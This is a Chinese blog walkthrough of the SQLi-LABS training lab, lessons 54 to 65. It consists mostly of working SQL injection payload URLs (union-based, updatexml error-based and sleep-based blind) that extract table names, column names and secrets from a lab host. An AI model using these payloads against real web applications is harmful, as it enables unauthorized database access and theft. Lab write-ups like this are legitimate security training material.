zoukankan      html  css  js  c++  java

  • SQLi-LABS Page-4 (Challenges) Less-54-Less-65

    Less-54 union - 1

    http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

    zgysfs4pe4

    http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7a677973667334706534)--+

    secret_7MLR

     http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(secret_7MLR+SEPARATOR+0x3c62723e)+FROM+zgysfs4pe4)--+

    Less-55 union - 2

    SELECT * FROM security.users WHERE id=($id) LIMIT 0,1

    http://10.10.202.112/sqli/Less-55?id=-1) union select 1,2,(SELECT+GROUP_CONCAT(id,0x7e,secret_L9QL+SEPARATOR+0x3c62723e)+FROM+qqks4m1bux)--+

     

     

    Less-56 union - 3

    SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1

    http://10.10.202.112/sqli/Less-56?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

    j7gins5xve

    http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6a3767696e7335787665)--+

    http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(secret_IZ5L+SEPARATOR+0x3c62723e)+FROM+j7gins5xve)--+

    Less- 57 union - 4

    $id= '"'.$id.'"';

    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

    http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

    suhaxhpjdj

     http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x737568617868706a646a)--+

    secret_091Y

     http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(secret_091Y+SEPARATOR+0x3c62723e)+FROM+suhaxhpjdj)--+

    Less-58 报错型盲注 - 1

    http://10.10.202.112/sqli/Less-58?id=1'  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

    sa77s59fy3

    http://10.10.202.112/sqli/Less-58?id=1'   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x73613737733539667933 limit 2,1)),null)--+

    http://10.10.202.112/sqli/Less-58?id=1'    and updatexml(null,concat(0x0a,(select concat(secret_LNXT) from sa77s59fy3 limit 0,1)),null)--+

    Less-59 报错型盲注 - 2

    http://10.10.202.112/sqli/Less-59?id=1  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

    6ew31kswfa

     http://10.10.202.112/sqli/Less-59?id=1   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x7a6c713665616533616c limit 2,1)),null)--+

    http://10.10.202.112/sqli/Less-59?id=1    and updatexml(null,concat(0x0a,(select concat(secret_PCWB) from zlq6eae3al limit 0,1)),null)--+

    Less- 60 报错型盲注 - 3

    -1")--+ 进行闭合

    http://10.10.202.112/sqli/Less-60?id=-1")     and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

    hcgeeqbc27

    http://10.10.202.112/sqli/Less-60?id=-1")      and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x68636765657162633237 limit 2,1)),null)--+

    secret_6YDQ

     http://10.10.202.112/sqli/Less-60?id=-1")    and updatexml(null,concat(0x0a,(select concat(secret_6YDQ) from hcgeeqbc27 limit 0,1)),null)--+ 

    Less 61 报错型盲注 - 4

    1')) --+ 进行闭合

    http://10.10.202.112/sqli/Less-61/index.php?id=1' ))   and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

    aum8al0pvg

    http://10.10.202.112/sqli/Less-61/index.php?id=1' ))    and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x61756d38616c30707667 limit 2,1)),null)--+

    secret_8MGI

     http://10.10.202.112/sqli/Less-61/index.php?id=1' ))     and updatexml(null,concat(0x0a,(select concat(secret_8MGI) from aum8al0pvg limit 0,1)),null)--+

    Less-62 盲注 - 1

    http://10.10.202.112/sqli/Less-62?id=1') and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(5))--+

    http://10.10.202.112/sqli/Less-62?id=1') and if(substr(@@version,1,1)>5,0,sleep(5))--+

    Less-63 盲注 - 2

    1'--+ 进行闭合

    http://10.10.202.112/sqli/Less-63?id=1' and if(substr(@@version,1,1)>5,0,sleep(5))--+

    Less-64 盲注 - 3

    http://10.10.202.112/sqli/Less-64?id=1)) and if(substr(@@version,1,1)>5,0,sleep(5))--+

    Less-65 盲注 - 4

    http://10.10.202.112/sqli/Less-65?id=1") and if(substr(@@version,1,1)>5,0,sleep(5))--+

    完结!!!

    点击赞赏二维码,您的支持将鼓励我继续创作!

     
  • 相关阅读:
    使用zoom.js 给博客园的图片添加点击图片放大功能
    html上传多图并预览
    html页面选择图片上传时实现图片预览功能
    html实现点击图片放大功能
    layui常用功能
    七牛云上传与删除图片
    寻找七牛云存储配置参数
    TP5之发送邮件
    TP5之一次选择多张图片并预览
    TP5之页面跳转样式
  • 原文地址:https://www.cnblogs.com/hack404/p/11099163.html
Copyright © 2011-2022 走看看